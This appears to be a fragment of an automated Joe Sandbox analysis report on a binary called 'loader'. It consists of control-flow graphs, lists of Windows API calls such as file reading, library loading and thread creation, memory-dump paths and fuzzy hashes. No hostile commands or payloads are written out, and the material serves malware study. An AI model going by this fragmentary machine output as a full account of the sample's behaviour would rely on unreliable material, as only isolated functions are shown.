                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7e217a3dec29189bbda6bfcc5818c7a8f236c1bb05bdb118644ece89d3c546ae
                                                                                      • Instruction ID: e87d3923dec8285b05783b01b3e8c63e0c1945c91724d950896cf891033927fd
                                                                                      • Opcode Fuzzy Hash: 7e217a3dec29189bbda6bfcc5818c7a8f236c1bb05bdb118644ece89d3c546ae
                                                                                      • Instruction Fuzzy Hash: 4D011474A142188FCB54EF69D885AD9F7F0EB18710F4084A9A88897340EBB4AAC4CF85

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 25 259dd3-259ddf 26 259e71-259e74 25->26 27 259de4-259df5 26->27 28 259e7a 26->28 30 259df7-259dfa 27->30 31 259e02-259e1b LoadLibraryExW 27->31 29 259e7c-259e80 28->29 32 259e00 30->32 33 259e9a-259e9c 30->33 34 259e81-259e91 31->34 35 259e1d-259e26 GetLastError 31->35 37 259e6e 32->37 33->29 34->33 36 259e93-259e94 FreeLibrary 34->36 38 259e5f-259e6c 35->38 39 259e28-259e3a call 25bc93 35->39 36->33 37->26 38->37 39->38 42 259e3c-259e4e call 25bc93 39->42 42->38 45 259e50-259e5d LoadLibraryExW 42->45 45->34 45->38
                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,CB8E8CE7,?,00259EE2,?,?,00000000), ref: 00259E94
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3664257935-537541572
                                                                                      • Opcode ID: 947473c3bed25c23f4e8db050f959c3dbee4877883300d34ed3552df263238f6
                                                                                      • Instruction ID: 41d8876306f67206abe4c00151752f22aa8f948d9475dc0f146a84a21607e455
                                                                                      • Opcode Fuzzy Hash: 947473c3bed25c23f4e8db050f959c3dbee4877883300d34ed3552df263238f6
                                                                                      • Instruction Fuzzy Hash: DE21EB31A10212EBC721DF60EC46B6A375CEF42BB2F250112ED16E7291DB70ED55C6D4

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 46 24beb0-24bf22 CreateFileA 47 24bf29-24bf37 46->47 48 24bff2-24c00c 47->48 49 24bf3d-24bf4a 47->49 50 24c16a 48->50 52 24bf50-24bf5d 49->52 53 24c021-24c054 GetFileSize 49->53 50->47 55 24bf63-24bf70 52->55 56 24c078-24c0ce call 254233 ReadFile 52->56 53->50 59 24bf76-24bf83 55->59 60 24c011-24c01c 55->60 56->50 63 24c12c-24c146 CloseHandle 59->63 64 24bf89-24bf96 59->64 60->50 63->50 66 24c0f6-24c108 call 25423c 64->66 67 24bf9c-24bfa9 64->67 66->50 70 24c0d3-24c0f1 67->70 71 24bfaf-24bfbc 67->71 70->50 74 24bfc2-24bfcf 71->74 75 24c059-24c073 CloseHandle 71->75 77 24bfd5-24bfe2 74->77 78 24c14b-24c169 call 254241 74->78 75->50 81 24c10d-24c127 CloseHandle 77->81 82 24bfe8-24bfed 77->82 81->50 82->50
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile
                                                                                      • String ID:
                                                                                      • API String ID: 823142352-0
                                                                                      • Opcode ID: cf3dcb9fb90917b2a3bd6e0cad39bbdac1a011f95da1797d0a4c44eb40ba4ee9
                                                                                      • Instruction ID: ad4db5412a7b87984affbb20010b3aaee4c9ba8d77d0ec7016fd5d8c4b2da76f
                                                                                      • Opcode Fuzzy Hash: cf3dcb9fb90917b2a3bd6e0cad39bbdac1a011f95da1797d0a4c44eb40ba4ee9
                                                                                      • Instruction Fuzzy Hash: A4716EB4925209CFCB08DFACD5586AEFBF0EB48700F20851EF84AAB350DB7499658F51

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(?,?,Function_00016E00,00000000,?,?), ref: 00256D2F
                                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,00253BEA), ref: 00256D3B
                                                                                      • __dosmaperr.LIBCMT ref: 00256D42
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                                                      • String ID:
                                                                                      • API String ID: 2744730728-0
                                                                                      • Opcode ID: 5ea3d9d45b7108b29415c2bb99a20d4d5182cbc2b86c778459ba3ed2f754f3fe
                                                                                      • Instruction ID: ca2190c6dd3fcdd41758ceec8e98e50ee013cbf1ab93f37141fdfc1046d9a9c2
                                                                                      • Opcode Fuzzy Hash: 5ea3d9d45b7108b29415c2bb99a20d4d5182cbc2b86c778459ba3ed2f754f3fe
                                                                                      • Instruction Fuzzy Hash: AC01927262120AAFDF159FA0DC0AAAE7B79EF40766F104458FC0197190DBB0DE68DB94

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(00000002,?,002570B1,002583A0,002583A0,?,00000002,CB8E8CE7,002583A0,00000002), ref: 00257000
                                                                                      • TerminateProcess.KERNEL32(00000000,?,002570B1,002583A0,002583A0,?,00000002,CB8E8CE7,002583A0,00000002), ref: 00257007
                                                                                      • ExitProcess.KERNEL32 ref: 00257019
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 87704eb62d95ed357f6dda1d2822a49f7eb2eb6cc9113bd757f1d26dfb138f70
                                                                                      • Instruction ID: 77b915764eb455f8effb3361b50585e35e6b060e6f382ea9abc4847fedbf95a2
                                                                                      • Opcode Fuzzy Hash: 87704eb62d95ed357f6dda1d2822a49f7eb2eb6cc9113bd757f1d26dfb138f70
                                                                                      • Instruction Fuzzy Hash: AED06C31414108ABCF112F60FC4D89D3F6EAB44352B848010F90A4A161CFB599AADAA4

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 112 25a732-25a737 113 25a739-25a751 112->113 114 25a753-25a757 113->114 115 25a75f-25a768 113->115 114->115 116 25a759-25a75d 114->116 117 25a77a 115->117 118 25a76a-25a76d 115->118 120 25a7d4-25a7d8 116->120 119 25a77c-25a789 GetStdHandle 117->119 121 25a776-25a778 118->121 122 25a76f-25a774 118->122 123 25a7b6-25a7c8 119->123 124 25a78b-25a78d 119->124 120->113 125 25a7de-25a7e1 120->125 121->119 122->119 123->120 127 25a7ca-25a7cd 123->127 124->123 126 25a78f-25a798 GetFileType 124->126 126->123 128 25a79a-25a7a3 126->128 127->120 129 25a7a5-25a7a9 128->129 130 25a7ab-25a7ae 128->130 129->120 130->120 131 25a7b0-25a7b4 130->131 131->120
                                                                                      APIs
                                                                                      • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0025A621,0026A088,0000000C), ref: 0025A77E
                                                                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0025A621,0026A088,0000000C), ref: 0025A790
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileHandleType
                                                                                      • String ID:
                                                                                      • API String ID: 3000768030-0
                                                                                      • Opcode ID: fe94c5833c6708bf4c3fed6a902671e646cdf1365f079e72062fd977ee35e545
                                                                                      • Instruction ID: 07e354a7d140fe849d5021b4ddf5649810f896448e8bbb7955dda31dd181624d
                                                                                      • Opcode Fuzzy Hash: fe94c5833c6708bf4c3fed6a902671e646cdf1365f079e72062fd977ee35e545
                                                                                      • Instruction Fuzzy Hash: BD110A711247424ACB304E3ECC8952AFAB4AB5E332B340719D9B6875F1D674D8AED24A

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(00269D20,0000000C), ref: 00256E13
                                                                                      • ExitThread.KERNEL32 ref: 00256E1A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorExitLastThread
                                                                                      • String ID:
                                                                                      • API String ID: 1611280651-0
                                                                                      • Opcode ID: 67db699a1531d640dd2b45c60cf66374f72b79b869a3c24306359fe1d687c6ed
                                                                                      • Instruction ID: ee58ff91c673d69c77dd786ac845fc76c753ad44aaaec7aad0edf340b2eefb18
                                                                                      • Opcode Fuzzy Hash: 67db699a1531d640dd2b45c60cf66374f72b79b869a3c24306359fe1d687c6ed
                                                                                      • Instruction Fuzzy Hash: BAF0AF74A20205AFDB01AFB0D84EA2E3B79FF05712F108549F8059B292DFB09965CF95

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 152 25b0cb-25b0d4 153 25b0d6-25b0e9 RtlFreeHeap 152->153 154 25b103-25b104 152->154 153->154 155 25b0eb-25b102 GetLastError call 25b7a0 call 25b757 153->155 155->154
                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,0025BC39,?,00000000,?,?,0025BB55,?,00000007,?,?,0025C16E,?,?), ref: 0025B0E1
                                                                                      • GetLastError.KERNEL32(?,?,0025BC39,?,00000000,?,?,0025BB55,?,00000007,?,?,0025C16E,?,?), ref: 0025B0EC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFreeHeapLast
                                                                                      • String ID:
                                                                                      • API String ID: 485612231-0
                                                                                      • Opcode ID: 01bda07d1e59240ee86613676b536f490fc653b8c0355eb603d3a5283e93b90d
                                                                                      • Instruction ID: e7c3a0be43281fb174f21707d2451cb9d2686e3cba7c8449accfdfb81c5de45f
                                                                                      • Opcode Fuzzy Hash: 01bda07d1e59240ee86613676b536f490fc653b8c0355eb603d3a5283e93b90d
                                                                                      • Instruction Fuzzy Hash: 21E0CD3210060867CB126FA0FC0DB697F5CDB45792F108060F90CD7061CF708964CB88

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 237 253b60-253be5 call 24e940 call 253cc0 call 253dc0 call 256ce6 245 253bea-253bf7 237->245 246 253bfe-253c0c 245->246 247 253c55-253c6b 246->247 248 253c12-253c1f 246->248 250 253cb5 247->250 251 253c25-253c32 248->251 252 253c84-253c95 call 25441d 248->252 250->246 255 253c9a-253cb2 call 253e30 call 254241 251->255 256 253c38-253c45 251->256 252->255 260 253c70-253c7f call 253de0 256->260 261 253c4b-253c50 256->261 260->250 261->250
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 94eff9ccd5ebf2907201301407304fe91d75c60f449853dfbb69ea4c15810a47
                                                                                      • Instruction ID: 30c4b81fa4fd8e96e9b7e524615fadc25b4a2e58f8188d99d0927c0181477341
                                                                                      • Opcode Fuzzy Hash: 94eff9ccd5ebf2907201301407304fe91d75c60f449853dfbb69ea4c15810a47
                                                                                      • Instruction Fuzzy Hash: 4E3109B0D242098FCB04DFA9C5946ADBBF0FF48346F50941AE856AB340DB759A18CF59

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 267 259e9e-259ec8 268 259ece-259ed0 267->268 269 259eca-259ecc 267->269 271 259ed6-259edd call 259dd3 268->271 272 259ed2-259ed4 268->272 270 259f1f-259f22 269->270 274 259ee2-259ee6 271->274 272->270 275 259f05-259f1c 274->275 276 259ee8-259ef6 GetProcAddress 274->276 278 259f1e 275->278 276->275 277 259ef8-259f03 call 256ad0 276->277 277->278 278->270
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 15b57e6b3093e650a9c62f7057c50d1b4fe4a65fdf57dc4966c99f47031163ea
                                                                                      • Instruction ID: 63a58c13ae5d8b773407c2da0bbf3fbad71817c77827e16044c7632dc7c8e358
                                                                                      • Opcode Fuzzy Hash: 15b57e6b3093e650a9c62f7057c50d1b4fe4a65fdf57dc4966c99f47031163ea
                                                                                      • Instruction Fuzzy Hash: 0B01F533224216EB8B028F6DFC49A667769FB813217688025FD05CB554EB70D8A49BD8

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateElliptic
                                                                                      • String ID:
                                                                                      • API String ID: 1611293138-0
                                                                                      • Opcode ID: 3a76ad0662589dbb2fa91ae88b4b72f3cc92dce7e03964244707337d4a56a578
                                                                                      • Instruction ID: e7a5a17d93e470c6ed70728f4b2e75d660e39b3e568e2b52ec45918adf188197
                                                                                      • Opcode Fuzzy Hash: 3a76ad0662589dbb2fa91ae88b4b72f3cc92dce7e03964244707337d4a56a578
                                                                                      • Instruction Fuzzy Hash: FF11D3B4D002099BCB04EFA9D4597AEFBF5EF48304F508829D855A7350EB74A658CF91

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 290 25bc45-25bc51 291 25bc83-25bc8e call 25b757 290->291 292 25bc53-25bc55 290->292 300 25bc90-25bc92 291->300 293 25bc57-25bc58 292->293 294 25bc6e-25bc7f RtlAllocateHeap 292->294 293->294 296 25bc81 294->296 297 25bc5a-25bc61 call 258327 294->297 296->300 297->291 302 25bc63-25bc6c call 257207 297->302 302->291 302->294
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,002541E0,?,?,00251007,?,0024FAB5), ref: 0025BC77
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: cbf54e58dca917ad80e165eaeedcae1f59c0ccdae1a69508a0f4089dc54ef3fd
                                                                                      • Instruction ID: 403cf036fad71b5d1fb414d0b76b7b5a52754c535d3d64da27c4efdcde924c67
                                                                                      • Opcode Fuzzy Hash: cbf54e58dca917ad80e165eaeedcae1f59c0ccdae1a69508a0f4089dc54ef3fd
                                                                                      • Instruction Fuzzy Hash: 5CE0E5311306126FDA232E75EC05B9E7A489B823B3F140123FC15961D0CFB0DC28C6AC
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00254CB6
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00254CC4
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00254CD5
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00254CE6
                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00254CF7
                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00254D08
                                                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 00254D19
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00254D2A
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 00254D3B
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00254D4C
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00254D5D
                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00254D6E
                                                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00254D7F
                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00254D90
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00254DA1
                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00254DB2
                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00254DC3
                                                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00254DD4
                                                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 00254DE5
                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 00254DF6
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 00254E07
                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00254E18
                                                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 00254E29
                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 00254E3A
                                                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 00254E4B
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00254E5C
                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00254E6D
                                                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 00254E7E
                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00254E8F
                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00254EA0
                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00254EB1
                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00254EC2
                                                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 00254ED3
                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00254EE4
                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 00254EF5
                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 00254F06
                                                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 00254F17
                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 00254F28
                                                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00254F39
                                                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00254F4A
                                                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00254F5B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1664399582.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1664383612.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664421732.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664438866.000000000026B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664455230.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664470846.000000000026F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1664488606.0000000000271000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_240000_loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
